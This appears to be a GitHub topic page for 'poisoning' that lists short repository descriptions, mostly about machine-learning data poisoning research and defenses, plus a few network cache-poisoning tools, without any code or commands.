Repository navigation
poisoning
- Website
- Wikipedia
Adversarial Robustness Toolbox (ART) - Python Library for Machine Learning Security - Evasion, Poisoning, Extraction, Inference - Red and Blue Teams
A curated list of trustworthy deep learning papers. Daily updating...
Stealing Wi-Fi passwords via browser's cache poisoning.
Contact: Maximilian Bachl, Alexander Hartl. Explores defenses against backdoors and poisoning attacks for Intrusion Detection Systems. Code for "EagerNet" is in the "eager" branch.
MITM ARP Cache poisoner implemented with Scapy and also a HTTP sniffer
Prediction of naloxone dose in opioids toxicity based on machine learning techniques
Simulation of FL in python for Digit Recognition ML model. Simulated poisoning attacks and studies their impact.
This study explores the vulnerability of the Federated Learning (FL) model where a portion of clients participating in the FL process is under the control of adversaries who don’t have access to the training data but can access the training model and its parameters.
M. Anisetti, C. A. Ardagna, A. Balestrucci, N. Bena, E. Damiani, C. Y. Yeun. "On the Robustness of Random Forest Against Data Poisoning: An Ensemble-Based Approach". In IEEE TSUSC, vol. 8 no. 4
This is a project by Lane Affield, Emma Gerdeman, and Munachi Okuagu to showcase what we have learned through Drake University's Artificial Intelligence Program